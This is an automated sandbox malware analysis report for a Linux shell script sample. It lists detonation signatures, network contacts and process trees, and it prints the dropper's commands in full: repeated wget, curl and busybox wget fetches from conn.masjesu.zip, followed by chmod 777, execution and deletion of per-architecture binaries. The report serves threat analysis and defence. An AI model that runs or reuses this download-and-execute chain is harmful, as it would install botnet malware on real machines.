Malware Analysis Report

2025-04-03 19:11

Sample ID 241121-kr9rks1elk
Target f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh
SHA256 f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846
Tags
discovery antivm defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846

Threat Level: Shows suspicious behavior

The file f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 08:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 08:51

Reported

2024-11-21 08:55

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

148s

Max time network

129s

Command Line

[/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh

[/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.193.91:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.7:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.39:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 08:51

Reported

2024-11-21 08:55

Platform

debian9-armhf-20240418-en

Max time kernel

148s

Max time network

3s

Command Line

[/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh

[/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-21 08:51

Reported

2024-11-21 08:56

Platform

debian9-mipsbe-20240611-en

Max time kernel

85s

Max time network

87s

Command Line

[/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY N/A
N/A /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD N/A
N/A /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa N/A
N/A /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx N/A
N/A /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL N/A
N/A /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I N/A
N/A /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo N/A
N/A /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa N/A
N/A /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a N/A
N/A /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp N/A
N/A /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR N/A
N/A /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p N/A
N/A /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA N/A
N/A /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY N/A
N/A /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo N/A
N/A /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa N/A
N/A /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a N/A
N/A /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp N/A
N/A /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR N/A
N/A /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p N/A
N/A /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA N/A
N/A /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY N/A
N/A /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY N/A
N/A /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD N/A
N/A /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa N/A
N/A /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx N/A
N/A /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL N/A
N/A /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY /usr/bin/curl N/A
File opened for modification /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD /usr/bin/curl N/A
File opened for modification /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR /usr/bin/curl N/A
File opened for modification /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p /usr/bin/curl N/A
File opened for modification /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA /usr/bin/curl N/A
File opened for modification /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY /usr/bin/curl N/A
File opened for modification /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo /usr/bin/curl N/A
File opened for modification /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY /usr/bin/curl N/A
File opened for modification /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa /usr/bin/curl N/A
File opened for modification /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa /usr/bin/curl N/A
File opened for modification /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx /usr/bin/curl N/A
File opened for modification /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY /usr/bin/curl N/A
File opened for modification /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp /usr/bin/curl N/A
File opened for modification /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA /usr/bin/curl N/A
File opened for modification /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL /usr/bin/curl N/A
File opened for modification /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp /usr/bin/curl N/A
File opened for modification /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p /usr/bin/curl N/A
File opened for modification /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo /usr/bin/curl N/A
File opened for modification /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a /usr/bin/curl N/A
File opened for modification /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a /usr/bin/curl N/A
File opened for modification /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD /usr/bin/curl N/A
File opened for modification /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I /usr/bin/curl N/A
File opened for modification /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa /usr/bin/curl N/A
File opened for modification /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx /usr/bin/curl N/A
File opened for modification /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL /usr/bin/curl N/A
File opened for modification /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I /usr/bin/curl N/A
File opened for modification /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa /usr/bin/curl N/A
File opened for modification /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR /usr/bin/curl N/A

Processes

/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh

[/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/bin/chmod

[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY

[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/bin/rm

[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/bin/chmod

[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD

[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/bin/rm

[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/bin/chmod

[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa

[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/bin/rm

[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/bin/chmod

[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx

[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/bin/rm

[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/bin/chmod

[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL

[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/bin/rm

[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/bin/chmod

[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I

[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/bin/rm

[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/bin/chmod

[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo

[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/bin/rm

[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/bin/chmod

[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa

[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/bin/rm

[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/bin/chmod

[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a

[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/bin/rm

[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/bin/chmod

[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp

[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/bin/rm

[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/bin/chmod

[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR

[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/bin/rm

[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/bin/chmod

[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p

[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/bin/rm

[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/bin/chmod

[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA

[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/bin/rm

[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/bin/chmod

[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY

[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/bin/rm

[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/bin/chmod

[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo

[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/bin/rm

[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/bin/chmod

[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa

[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/bin/rm

[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/bin/busybox

